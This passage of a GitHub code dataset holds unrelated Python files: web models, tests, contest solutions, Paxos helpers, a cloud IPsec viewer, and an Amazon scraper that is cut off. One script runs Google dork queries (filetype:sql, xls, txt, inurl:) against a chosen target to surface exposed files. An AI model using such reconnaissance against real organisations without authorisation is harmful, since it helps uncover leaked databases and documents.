TopicModel(BaseModel):\n\n table=\"topics\"\n json_fields = ['id', 'title', 'players', 'setting', 'plot', 'conflict', 'theme', 'narrative_arc', 'jokes', 'users_id']\n\n basic_select = \"\"\"\n topics.id AS id,\n title,\n users_id,\n players,\n setting,\n plot,\n conflict,\n theme,\n narrative_arc,\n\n users.id AS users_id,\n users.email AS users_email\n \"\"\"\n\n basic_joins = \"\"\"\n\n LEFT JOIN users ON users.id = topics.users_id\n \"\"\"\n\n def __init__(self, data):\n\n self.id = data['id']\n self.title = data['title']\n self.players = data['players']\n self.setting = data['setting']\n self.plot = data['plot']\n self.conflict = data['conflict']\n self.theme = data['theme']\n self.narrative_arc = data['narrative_arc']\n\n self.user = UserModel({\n 'id': data['users_id'],\n 'email': data['users_email']\n })\n\n self._jokes = None\n\n @property # lazy loading - only loads the jokes data if needed;\n def jokes(self):\n \n if self._jokes is None:\n self._jokes = JokeModel.filter_all_by({'topics_id': self.id}, jsonify=True)\n \n return self._jokes\n\n @classmethod\n def add(cls, user, new_topic):\n\n query = \"\"\"\n INSERT INTO topics\n ( \n title,\n players,\n setting,\n plot,\n conflict,\n theme,\n narrative_arc,\n users_id\n )\n VALUES\n (\n %(title)s,\n %(players)s,\n %(setting)s,\n %(plot)s,\n %(conflict)s,\n %(theme)s,\n %(narrative_arc)s,\n {users_id}\n )\n \"\"\".format(users_id=user.id)\n \n new_topic_id = MySQLConnection(cls.db).query_db(query, {\n 'title': new_topic['title'],\n 'players': '' if 'players' not in new_topic else new_topic['players'],\n 'setting': '' if 'setting' not in new_topic else new_topic['setting'],\n 'plot': '' if 'plot' not in new_topic else new_topic['plot'],\n 'conflict': '' if 'conflict' not in new_topic else new_topic['conflict'],\n 'theme': '' if 'theme' not in new_topic else new_topic['theme'],\n 'narrative_arc': '' if 'narrative_arc' not in new_topic else new_topic['narrative_arc']\n })\n \n return None if not new_topic_id else cls.get_by_id(new_topic_id)\n\n @classmethod\n def update(cls, topic, update_data):\n\n query = \"\"\"\n UPDATE topics \n SET \n title = %(title)s,\n players = %(players)s, \n setting = %(setting)s, \n plot = %(plot)s, \n conflict = %(conflict)s, \n theme = %(theme)s, \n narrative_arc = %(narrative_arc)s,\n updated_at = NOW()\n WHERE \n id = {topic_id}\n \"\"\".format(topic_id=topic.id)\n\n topic_id = MySQLConnection(cls.db).query_db(query, {\n 'title': topic.title,\n 'players': topic.players if 'players' not in update_data else update_data['players'],\n 'setting': topic.setting if 'setting' not in update_data else update_data['setting'],\n 'plot': topic.plot if 'plot' not in update_data else update_data['plot'],\n 'conflict': topic.conflict if 'conflict' not in update_data else update_data['conflict'],\n 'theme': topic.theme if 'theme' not in update_data else update_data['theme'],\n 'narrative_arc': topic.narrative_arc if 'narrative_arc' not in update_data else update_data['narrative_arc']\n })\n\n return cls.get_by_id(topic.id) if topic_id else None\n\n @classmethod\n def is_valid(cls, topic):\n\n return 'title' in topic and topic['title'] != ''\n\n \"\"\"\n return ('players' in topic and topic['players']!= '') or \\\n ('setting' in topic and topic['setting'] != '') or \\\n ('plot' in topic and topic['plot'] != '') or \\\n ('conflict' in topic and topic['conflict'] != '') or \\\n ('theme' in topic and topic['theme'] != '') or \\\n ('narrative_arc' in topic and topic['narrative_arc'] != '')\n \"\"\"","repo_name":"instructorlee/react_integration_flask_app","sub_path":"app/models/topic_model.py","file_name":"topic_model.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28475676732","text":"import os.path as osp\n\nimport pytest\n\nfrom gomoku.board import Board\nfrom gomoku.game_handler import GameHandler\nfrom gomoku.mcts import MCTSAgent\nfrom gomoku.player import Player\nfrom gomoku.script import Script\n\n\ndef get_gh_from_script(filename):\n gh = GameHandler(Board(), [Player(1), Player(2)])\n base_dir, suffix = 'scripts', '.txt'\n path = osp.join(base_dir, filename + suffix)\n script = Script(path)\n while script.running():\n gh.do_move(script.get_move())\n return gh\n\n\nBLACK = 1\nMCTS_BASIC = {\n 'four': [(7, 13), (12, 8)],\n}\nMCTS_OPPONENT = {\n 'four_opponent': [(7, 13)],\n}\n\nFILES = list(MCTS_BASIC.keys()) + list(MCTS_OPPONENT.keys())\nNODES = {path: get_gh_from_script(path) for path in FILES}\n\n\n@pytest.mark.parametrize(\"problem\", MCTS_BASIC.items())\ndef test_basic(problem):\n board_name, best_moves = problem\n game_handler = NODES[board_name]\n black_mcts_agent = MCTSAgent(BLACK, depth=1)\n best_move = black_mcts_agent.find_move(game_handler)\n assert best_move in best_moves\n\n\n@pytest.mark.parametrize('execution_number', range(1))\n@pytest.mark.parametrize(\"problem\", MCTS_OPPONENT.items())\ndef test_opponent(problem, execution_number):\n board_name, best_moves = problem\n game_handler = NODES[board_name]\n black_mcts_agent = MCTSAgent(BLACK, depth=5, time_limit=20)\n best_move = black_mcts_agent.find_move(game_handler)\n assert best_move in best_moves\n","repo_name":"mtrazzi/gomoku","sub_path":"tests/test_mcts.py","file_name":"test_mcts.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"9615675246","text":"from contextlib import contextmanager\nfrom functools import wraps\nimport logging\nfrom sqlalchemy.orm import sessionmaker\nfrom config import engine\n\nLOGGER = logging.getLogger(__file__)\n\n@contextmanager\ndef create_session():\n \"\"\"\n Simple context manager that will create and destroy a session\n \"\"\"\n Session = sessionmaker(bind=engine)\n session = Session()\n try:\n yield session\n session.commit()\n except Exception:\n session.rollback()\n raise\n finally:\n session.close()\n\n\ndef provide_session(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n session_arg_name = \"session\"\n func_params = func.__code__.co_varnames\n if session_arg_name not in func_params:\n logging.warn(\"No `session` parameter exists for this function. Doing nothing.\")\n return func(*args, **kwargs)\n in_args = session_arg_name in func_params and func_params.index(session_arg_name) < len(args)\n in_kwargs = session_arg_name in kwargs\n if in_args or in_kwargs:\n return func(*args, **kwargs)\n else:\n with create_session() as session:\n return func(*args, session=session, **kwargs)\n return wrapper","repo_name":"c-simpson/paws-data-pipeline","sub_path":"src/server/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"29744458355","text":"import numpy as np\nimport pandas as pd\nimport math\n\n\ndef scanData(input):\n f = open(input)\n\n tileNames = list()\n\n def filter(string):\n ret = []\n for i in string:\n if i.isnumeric():\n ret.append(i)\n\n return \"\".join(ret)\n\n def token(string):\n ret = []\n for i in string:\n if i != '\\n':\n ret.append(i)\n\n return ret\n\n df = pd.DataFrame()\n\n for i in f:\n if 'Tile' in i:\n tileNames.append(filter(i))\n pass\n elif i != '\\n':\n df = df.append(token(i))\n\n data = np.array(df[0])\n numTiles = len(tileNames)\n data = (data.reshape(numTiles, 10, 10))\n\n ret = {}\n index = 0\n for i in tileNames:\n ret.update({i: pd.DataFrame(data[index])})\n index = index + 1\n\n return ret\n\ndef getBound(df):\n top = df.iloc[0].tolist()\n bottom = df.iloc[9].tolist()\n left = df[0].tolist()\n right = df[9].tolist()\n topF = top.copy()\n topF.reverse()\n bottomF = bottom.copy()\n bottomF.reverse()\n leftF = left.copy()\n leftF.reverse()\n rightF = right.copy()\n rightF.reverse()\n\n return top,bottom,left,right,topF,bottomF,leftF,rightF\n\ndef Match(t,b,l,r,top,bottom,left,right):\n if t==bottom:\n return \"Above\"\n elif b==top:\n return \"Bottom\"\n elif l==right :\n return \"Left\"\n elif r ==left:\n return \"Right\"\n else:\n return \"\"\n\ndef unFlip(df):\n ret = (df.iloc[::-1])\n return pd.DataFrame(ret.to_numpy())\n\ndef rotate(df):\n return pd.DataFrame(unFlip(df.T).to_numpy())\n\ndef findBorder(d,key):\n copy = d.copy()\n copy.pop(key)\n ret = {}\n t, b, l, r, tf,bf,lf,rf = getBound(d[key])\n for i in copy.keys():\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n norm = [top,bottom,left,right]\n flip = [topF, bottomF, leftF, rightF]\n combined = norm+flip\n if(t in combined )|( b in combined )| (l in combined )|( r in combined):\n tryFlip = True\n #isFlipped = (t in flip )|( b in flip )|( l in flip )|( r in flip) | (t==top) | (r == right) | (l == left) | (b==bottom)\n # if (t in flip ) & (b in flip) & (l in flip) & (r in flip):\n # isFlipped = False\n for loop in range(4):\n if (Match(t, b, l, r, top, bottom, left, right) == \"\"):\n copy.update({i: rotate(copy[i])})\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n else:\n tryFlip=False\n break\n if(tryFlip):\n copy.update({i:unFlip(copy[i])})\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n for n in range(4):\n if(Match(t,b,l,r,top,bottom,left,right)==\"\"):\n copy.update({i: rotate(copy[i])})\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n else:\n break\n\n ret.update({i:Match(t,b,l,r,top,bottom,left,right)})\n return ret,copy\n pass\n\ndef setupDict(input):\n ret = {}\n for i in input.keys():\n ret.update({i:False})\n return ret\n\ndef recursiveTrace( tileKey, input, initial):\n if(recursiveDict[tileKey]==True):\n return\n if(initial==True):\n tupleDict.update({tileKey:(0,0)})\n relation,update = findBorder(input,tileKey)\n relationDict.update({tileKey:relation})\n recursiveDict.update({tileKey:True})\n input.update(update)\n NearbyTiles = []\n for i in relation.keys():\n if relation[i] != '':\n NearbyTiles.append(i)\n for j in NearbyTiles:\n if (j in tupleDict.keys()) == False:\n if relation[j] == 'Left':\n tupleDict.update({j:(tupleDict[tileKey][0]-1,tupleDict[tileKey][1])})\n if relation[j] == 'Right':\n tupleDict.update({j: (tupleDict[tileKey][0] + 1, tupleDict[tileKey][1])})\n if relation[j] == 'Above':\n tupleDict.update({j: (tupleDict[tileKey][0], tupleDict[tileKey][1]+1)})\n if relation[j] == 'Bottom':\n tupleDict.update({j: (tupleDict[tileKey][0], tupleDict[tileKey][1]-1)})\n\n recursiveTrace(tileKey=j,input = input, initial = False)\n\n return input\n\ndef findOrder():\n smallestX = 0\n largestY = 0\n for i in tupleDict.keys():\n if (tupleDict[i][0] < smallestX):\n smallestX = tupleDict[i][0]\n if (tupleDict[i][1] > largestY):\n largestY = tupleDict[i][1]\n\n\n list = []\n\n outerIndex = 0\n for i in range(length):\n innerIndex = 0\n for j in range(length):\n for k in tupleDict.keys():\n if (tupleDict[k] == (smallestX + innerIndex, largestY - outerIndex)):\n list.append(k)\n innerIndex = innerIndex + 1\n outerIndex = outerIndex + 1\n numpy = np.array(list)\n numpy = numpy.reshape(length, length)\n return numpy\n\n\ndata = scanData('sample.txt')\n\ninput = data.copy()\nrecursiveDict = setupDict(input)\nrelationDict = {}\ntupleDict = {}\n\nfinalImage = recursiveTrace(tileKey=str(list(data.keys())[0]),input=data, initial=True)\nlength = int(math.sqrt(len(data)))\nfinalOrder = findOrder()\nfourCorners = [finalOrder[0,0],finalOrder[0,length-1],finalOrder[length-1,0],finalOrder[length-1,length-1]]\n\n\ndf = pd.DataFrame()\nfor i in finalOrder:\n listOfDf = []\n for j in i:\n listOfDf.append(finalImage[j])\n temp = pd.concat(listOfDf,axis = 1)\n df = pd.concat([df,temp],axis = 0)\n\ndf.columns = [i for i in range(length*10)]\ndf.index = [i for i in range(length*10)]\nprint(df)\nnpArray = df.to_numpy().flatten()\nindex = 0\nnumSM = 0\nfor i in npArray:\n if(index+2*(length*10) < len(npArray)):\n if(npArray[index]=='#'):\n if(npArray[index+(length*10)-18]=='#'):\n if(npArray[index+(length*10)-13]=='#'):\n if (npArray[index+(length*10)-12] == '#'):\n if (npArray[index+(length*10)-7] == '#'):\n if (npArray[index + (length * 10) - 6] == '#'):\n if (npArray[index + (length * 10) - 1] == '#'):\n if (npArray[index + (length * 10)] == '#'):\n if (npArray[index + (length * 10) +1] == '#'):\n if (npArray[index + 2*(length * 10) - 2] == '#'):\n if (npArray[index + 2*(length * 10) - 5] == '#'):\n if (npArray[index + 2*(length * 10) - 8] == '#'):\n if (npArray[index + 2*(length * 10) - 11] == '#'):\n if (npArray[index + 2*(length * 10) - 14] == '#'):\n if (npArray[index + 2*(length * 10) - 17] == '#'):\n numSM = numSM+1\n\n index = index +1\n\nprint(numSM)\n\n\n#print(f'Four Corners are {fourCorners}')\n#print(f'Final Ouput is {int(fourCorners[0])*int(fourCorners[1])*int(fourCorners[2])*int(fourCorners[3])}')\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Goubugi/Advent","sub_path":"2020/Day_20/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38957014254","text":"# 정수 삼각형\r\nimport sys\r\n\r\nn = int(sys.stdin.readline())\r\nvals = []\r\n\r\nfor i in range(n):\r\n\tval = list(map(int, sys.stdin.readline().split()))\r\n\tvals.append(val)\r\n\r\nfor i in range(1, n):\r\n\tfor j in range(i + 1):\r\n\t\tif (j == 0):\r\n\t\t\tvals[i][j] += vals[i - 1][j]\r\n\t\telif (j == i):\r\n\t\t\tvals[i][j] += vals[i - 1][j - 1]\r\n\t\telse:\r\n\t\t\tvals[i][j] += max(vals[i - 1][j - 1], vals[i - 1][j])\r\n\r\nprint(max(vals[n - 1]))","repo_name":"Min-h-96/PS","sub_path":"Python/14단계-동적계획법1/1932.py","file_name":"1932.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7003276284","text":"#!/usr/bin/env python\n\nimport operator\n\n\nclass Solution(object):\n OPS = {'+': operator.add, '-': operator.sub, '*': operator.mul}\n\n def _parse(self, input):\n \"\"\"\n Parses the string expression into a list of integers and function\n operators.\n \"\"\"\n tokens = []\n start = 0\n\n for i in range(1, len(input)):\n c = input[i]\n if c in Solution.OPS:\n tokens.append(int(input[start:i]))\n tokens.append(Solution.OPS[c])\n start = i + 1\n\n tail = int(input[start:])\n tokens.append(tail)\n\n return tokens\n\n def _diffWaysToCompute(self, tokens, i, j, cache):\n \"\"\"\n Returns all possible computation results from all possible ways of\n arranging parenthesis around tokens[i:j + 1]. tokens[i] and tokens[j]\n must be numeric constants while all in-between tokens must alternate\n between numeric constants and function operators.\n\n Splits tokens[i:j + 1] around each operators in the range, computes\n ways for each left and right side, and combines according to the\n operator that the tokens were split around. Uses DP to avoid\n recomputing overlapping sub-problems.\n \"\"\"\n # The DP indeces for each [i...j] range. For a token array with N\n # numeric constants, there are 2 * N - 1 total tokens because there is\n # an operator between each numeric constant.\n dpi = int(i / 2)\n dpj = int(j / 2)\n\n if i == j:\n # Single number without any surrounding operators.\n return [tokens[i]]\n elif cache[dpi][dpj] is not None:\n # Reuse previously computed result.\n return cache[dpi][dpj]\n\n ways = []\n\n # Step through tokens and split around each operator.\n for k in range(i + 1, j, 2):\n lhs = self._diffWaysToCompute(tokens, i, k - 1, cache)\n rhs = self._diffWaysToCompute(tokens, k + 1, j, cache)\n op = tokens[k]\n\n # Combine each possible result from the left split with each\n # possible result from the right split.\n for l in lhs:\n for r in rhs:\n ways.append(op(l, r))\n\n cache[dpi][dpj] = ways\n return ways\n\n def diffWaysToCompute(self, input):\n \"\"\"\n Returns all possible computation results from all possible ways of\n arranging parenthesis in the given input. The input must be a sequence\n of integers separated by the operators +, -, or * and nothing else.\n \"\"\"\n if len(input) == 0:\n return []\n tokens = self._parse(input)\n\n # Out of N tokens (N + 1) / 2 are numeric constants. Create a 2D matrix\n # that will serve as a DP cache for each [i...j] range of constants.\n n = int((len(tokens) + 1) / 2)\n cache = [[None for i in range(0, n)] for j in range(0, n)]\n\n return self._diffWaysToCompute(tokens, 0, len(tokens) - 1, cache)\n\n\ndef main():\n sol = Solution()\n actual = set(sol.diffWaysToCompute('2*3-4*5'))\n expected = set([-34, -14, -10, -10, 10])\n try:\n assert actual == expected\n except AssertionError:\n print('Expected %s but got %s.' % (expected, actual))\n raise\n\n print('Tests pass!')\n print('Please run this solution on LeetCode.')\n print('https://leetcode.com/problems/different-ways-to-add-parentheses/')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andreimaximov/algorithms","sub_path":"leetcode/algorithms/different-ways-to-add-parenthesis/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"48"} +{"seq_id":"31211422812","text":"# ----------------------------------------------------------------------------------------------------\n#\n# UTILS FUNCTIONS\n#\n# ----------------------------------------------------------------------------------------------------\n\nPRINTING = False\n\n\ndef greedy_leader_election(network):\n\n \"\"\" Procedure to elect the leader of Paxos instances.\n\n :param network: dict\n The network of processes divided by roles.\n :return: int\n The process id (p_id) of the leader.\n \"\"\"\n\n p_id = network['proposers'][-1]\n return p_id\n\n\ndef import_config(config_file):\n\n \"\"\" Import and parse the config file in order to convert it to a list.\n\n :param config_file: str\n The name of the config file.\n :return: list\n The list containing info about processes in the config file.\n \"\"\"\n\n config = []\n with open(config_file, 'r') as f:\n for line in f.readlines():\n if line != '':\n role, ip, port = line.strip('\\n').split(' ')\n config.append([role, ip, port])\n return config\n\n\ndef create_network(config):\n\n \"\"\" Convert config list to a network dictionary where the processes are divided by roles.\n\n :param config: list\n The list create using the config file.\n :return: dict\n The dictionary containing a network of processes divided by roles.\n \"\"\"\n\n network = {'clients': [], 'proposers': [], 'acceptors': [], 'learners': []}\n k = 0\n for agent in config:\n role, ip, port = agent[0], agent[1], int(agent[2])\n network[role] = {'ip': ip, 'port': port}\n k += 1\n return network\n\n\ndef print_stuff(msg):\n\n \"\"\" It just allow to easily insert or eliminate the prints \"\"\"\n\n if PRINTING:\n print(msg)\n\n","repo_name":"HeapHop30/atomic-broadcast-paxos","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"42092569643","text":"import yaml\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport os\n\nfrom utils.opencvhelper import MatcherWrapper\n\nfrom models import get_model\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('config', None, \"\"\"Path to the configuration file.\"\"\")\n\n\ndef draw_keypoints(img, kp):\n\n cv_kpts = [cv2.KeyPoint(kp[i][0], kp[i][1], 1) for i in range(kp.shape[0])]\n\n out_img = img\n\n cv2.drawKeypoints(out_img, cv_kpts, out_img)\n\n cv2.imwrite('tmp.png', out_img)\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n \"\"\"Program entrance.\"\"\"\n # parse input\n with open(FLAGS.config, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n model = get_model('feat_model')(config['model_path'], **config['net'])\n\n img_folder = config['img_folder']\n out_folder = config['out_folder']\n\n for frame in os.listdir(img_folder):\n frameid = frame.rstrip('.png')\n print(frameid)\n img_path = os.path.join(img_folder, frame)\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)[..., np.newaxis]\n desc, kpt, score = model.run_test_data(gray)\n print(desc.shape)\n print(kpt.shape)\n print(score.shape)\n out_path = os.path.join(out_folder, frameid + '.npz')\n np.savez_compressed(out_path, keypoints=kpt, scores=score, local_descriptors=desc)\n\n draw_keypoints(img, kpt)\n # break\n\n\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n","repo_name":"smy-THU/superglue-jittor","sub_path":"third_party/aslfeat/gen_keypoints.py","file_name":"gen_keypoints.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"39607144214","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGET /v2.0/vpn/ipsec-site-connections/{connection-id}\nShow IPSec site connection details\n指定したIPsecサイト間の接続の詳細を表示する\n\"\"\"\n\n\"\"\"\n実行例\n\nbash-4.4$ ./bin/k5-list-site-connections.py | ./bin/k5-show-site-connection.py -\nconnection_id: d2a3ddf3-3b0c-4914-8851-17cd0eece29e\nGET /v2.0/vpn/ipsec-site-connections/{connection-id}\n================= ====================================\nname iida-az1-connection-01\nid d2a3ddf3-3b0c-4914-8851-17cd0eece29e\npeer_address 2.2.2.2\npeer_id 2.2.2.2\npsk passpass\nvpnservice_id 75f35f53-ecbd-4748-a070-3316435e35cc\nikepolicy_id 9fc16042-95ae-46b9-84bc-4777b3b9f89c\nipsecpolicy_id 26525271-0337-4ad2-b0d3-120814fc0794\nroute_mode static\nmtu 1500\ninitiator bi-directional\nauth_mode psk\nstatus DOWN\ntenant_id a5001a8b9c4a4712985c11377bd6d4fe\navailability_zone jp-east-1a\ndescription\n================= ====================================\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport sys\n\ndef here(path=''):\n \"\"\"相対パスを絶対パスに変換して返却します\"\"\"\n if getattr(sys, 'frozen', False):\n # cx_Freezeで固めた場合は実行ファイルからの相対パス\n return os.path.abspath(os.path.join(os.path.dirname(sys.executable), path))\n else:\n # 通常はこのファイルの場所からの相対パス\n return os.path.abspath(os.path.join(os.path.dirname(__file__), path))\n\n# libフォルダにおいたpythonスクリプトを読みこませるための処理\nif not here(\"../lib\") in sys.path:\n sys.path.append(here(\"../lib\"))\n\nif not here(\"../lib/site-packages\") in sys.path:\n sys.path.append(here(\"../lib/site-packages\"))\n\ntry:\n from k5c import k5c\nexcept ImportError as e:\n logging.exception(\"k5cモジュールのインポートに失敗しました: %s\", e)\n sys.exit(1)\n\ntry:\n from tabulate import tabulate\nexcept ImportError as e:\n logging.exception(\"tabulateモジュールのインポートに失敗しました: %s\", e)\n sys.exit(1)\n\n#\n# APIにアクセスする\n#\ndef access_api(connection_id=\"\"):\n \"\"\"REST APIにアクセスします\"\"\"\n\n # 接続先\n url = k5c.EP_NETWORK + \"/v2.0/vpn/ipsec-site-connections/\" + connection_id\n\n # Clientクラスをインスタンス化\n c = k5c.Client()\n\n # GETメソッドで取得して、結果のオブジェクトを得る\n r = c.get(url=url)\n\n return r\n\n\n#\n# 結果を表示する\n#\ndef print_result(result):\n \"\"\"結果を表示します\"\"\"\n\n # ステータスコードは'status_code'キーに格納\n status_code = result.get('status_code', -1)\n\n # ステータスコードが異常な場合\n if status_code < 0 or status_code >= 400:\n print(json.dumps(result, indent=2))\n return\n\n # データは'data'キーに格納\n data = result.get('data', None)\n if not data:\n logging.error(\"no data found\")\n return\n\n #{\n # \"data\": {\n # \"ipsec_site_connection\": {\n # \"dpd\": {\n # \"action\": \"restart\",\n # \"timeout\": 30,\n # \"interval\": 10\n # },\n # \"tenant_id\": \"a5001a8b9c4a4712985c11377bd6d4fe\",\n # \"admin_state_up\": true,\n # \"description\": \"\",\n # \"initiator\": \"bi-directional\",\n # \"ipsecpolicy_id\": \"26525271-0337-4ad2-b0d3-120814fc0794\",\n # \"name\": \"iida-az1-connection-01\",\n # \"route_mode\": \"static\",\n # \"peer_cidrs\": [\n # \"10.2.1.0/24\"\n # ],\n # \"psk\": \"passpass\",\n # \"auth_mode\": \"psk\",\n # \"status\": \"DOWN\",\n # \"mtu\": 1500,\n # \"peer_address\": \"2.2.2.2\",\n # \"peer_id\": \"2.2.2.2\",\n # \"id\": \"d2a3ddf3-3b0c-4914-8851-17cd0eece29e\",\n # \"ikepolicy_id\": \"9fc16042-95ae-46b9-84bc-4777b3b9f89c\",\n # \"vpnservice_id\": \"75f35f53-ecbd-4748-a070-3316435e35cc\",\n # \"availability_zone\": \"jp-east-1a\"\n # }\n # },\n # \"Content-Type\": \"application/json;charset=UTF-8\",\n # \"status_code\": 200\n #}\n\n item = data.get('ipsec_site_connection', {})\n\n disp_keys = [\n 'name', 'id', 'peer_address', 'peer_id', 'psk',\n 'vpnservice_id', 'ikepolicy_id', 'ipsecpolicy_id',\n 'route_mode', 'mtu', 'initiator', 'auth_mode', 'status',\n 'tenant_id', 'availability_zone', 'description']\n\n disp_list = []\n\n for key in disp_keys:\n row = []\n row.append(key)\n row.append(item.get(key, ''))\n disp_list.append(row)\n\n print(\"GET /v2.0/vpn/ipsec-site-connections/{connection-id}\")\n print(tabulate(disp_list, tablefmt='rst'))\n\n # \"dpd\": {\n # \"action\": \"restart\",\n # \"timeout\": 30,\n # \"interval\": 10\n # },\n dpd = item.get('dpd', {})\n dpd_list = []\n dpd_keys = ['action', 'timeout', 'interval']\n for key in dpd_keys:\n row = []\n row.append(key)\n row.append(dpd.get(key, ''))\n dpd_list.append(row)\n\n print(\"\")\n print(\"dpd\")\n print(tabulate(dpd_list, tablefmt='rst'))\n\n # \"peer_cidrs\": [\n # \"10.2.1.0/24\"\n # ],\n peer_cidrs_list = []\n for cidr in item.get('peer_cidrs', []):\n peer_cidrs_list.append([cidr])\n\n print(\"\")\n print(\"peer_cidrs\")\n print(tabulate(peer_cidrs_list, tablefmt='rst'))\n\n\nif __name__ == '__main__':\n\n import argparse\n\n def main():\n \"\"\"メイン関数\"\"\"\n parser = argparse.ArgumentParser(description='Shows details about a specified IPSec site-to-site connection.')\n parser.add_argument('connection_id', metavar='id', help='The vpnservice id.')\n parser.add_argument('--dump', action='store_true', default=False, help='Dump json result and exit.')\n args = parser.parse_args()\n connection_id = args.connection_id\n dump = args.dump\n\n if connection_id == '-':\n import re\n regex = re.compile('^([a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}).*', re.I)\n for line in sys.stdin:\n match = regex.match(line)\n if match:\n uuid = match.group(1)\n result = access_api(connection_id=uuid)\n print(\"connection_id: {}\".format(uuid))\n print_result(result)\n print(\"\")\n sys.stdout.flush()\n return 0\n\n # 実行\n result = access_api(connection_id=connection_id)\n\n # 中身を確認\n if dump:\n print(json.dumps(result, indent=2))\n return 0\n\n # 表示\n print_result(result)\n\n return 0\n\n\n # 実行\n sys.exit(main())\n","repo_name":"takamitsu-iida/k5c","sub_path":"bin/k5-show-site-connection.py","file_name":"k5-show-site-connection.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8437129606","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = 1e9\n\nV,E = map(int, input().split())\nst = int(input())\ngraph = [[] for _ in range(V+1)]\nfor _ in range(E):\n u,v,w = map(int, input().split())\n graph[u].append((v, w))\ndist = [INF] * (V+1)\n\ndef func():\n q = []\n dist[st] = 0\n heapq.heappush(q, (0, st))\n \n while q:\n d, now = heapq.heappop(q)\n if dist[now] < d:\n continue\n for v,w in graph[now]:\n cost = d + w\n if cost < dist[v]:\n dist[v] = cost\n heapq.heappush(q, (cost, v))\n \nfunc()\n\nfor i in range(1, V+1):\n if dist[i] == INF:\n print('INF')\n else:\n print(dist[i])\n","repo_name":"moon9ua/study_ps","sub_path":"BOJ/shortest_path/dijkstra/1753.py","file_name":"1753.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38735156501","text":"from googlesearch import search\nimport sys\n\narguments = sys.argv[1:]\ntarget = ' '.join(arguments)\n\n\ndef google_dork_search(query, num_results=10):\n try:\n print(f\"Looking the following query: {query}\")\n results = search(query, stop=num_results)\n for i, results in enumerate(results, start=1):\n print(f\"{i}. {results}\")\n\n except Exception as e:\n print(f\"Error: {e}\")\n\n\nsearchList = [\n f'\\\"{target}\\\"',\n f'site:linkedin.com \\\"{target}\\\"',\n f'inurl:\\\"{target}\\\"',\n f'intitle:\\\"{target}\\\"',\n f'intext:\\\"{target}\\\"',\n f'filetype:pdf \\\"{target}\\\"',\n f'filetype:docs \\\"{target}\\\"',\n f'filetype:sql \\\"{target}\\\"',\n f'filetype:xls \\\"{target}\\\"',\n f'filetype:txt \\\"{target}\\\"',\n]\n\nfor query in searchList:\n google_dork_search(query)\n","repo_name":"hoyosdilan/googleDorking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31212668340","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport time\r\n\r\ndef scrape_products(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}\r\n response = requests.get(url, headers=headers)\r\n\r\n if response.status_code == 200:\r\n soup = BeautifulSoup(response.content, \"html.parser\")\r\n products = []\r\n\r\n # Find product containers on the page\r\n product_containers = soup.find_all(\"div\", {\"data-component-type\": \"s-search-result\"})\r\n\r\n for container in product_containers:\r\n try:\r\n product_url = \"https://www.amazon.in\" + container.find(\"a\", class_=\"a-link-normal\").get(\"href\")\r\n product_name = container.find(\"span\", class_=\"a-size-medium\").text.strip()\r\n product_price = container.find(\"span\", class_=\"a-offscreen\").text.strip()\r\n product_rating = container.find(\"span\", class_=\"a-icon-alt\").text.strip()\r\n product_reviews = container.find(\"span\", {\"class\": \"a-size-base\"}).text.strip()\r\n products.append({\"Product URL\": product_url, \"Product Name\": product_name, \"Product Price\": product_price, \"Rating\": product_rating, \"Number of Reviews\": product_reviews})\r\n except AttributeError:\r\n continue\r\n\r\n return products\r\n\r\n else:\r\n print(f\"Failed to fetch the page: {url}\")\r\n return None\r\n\r\nbase_url = 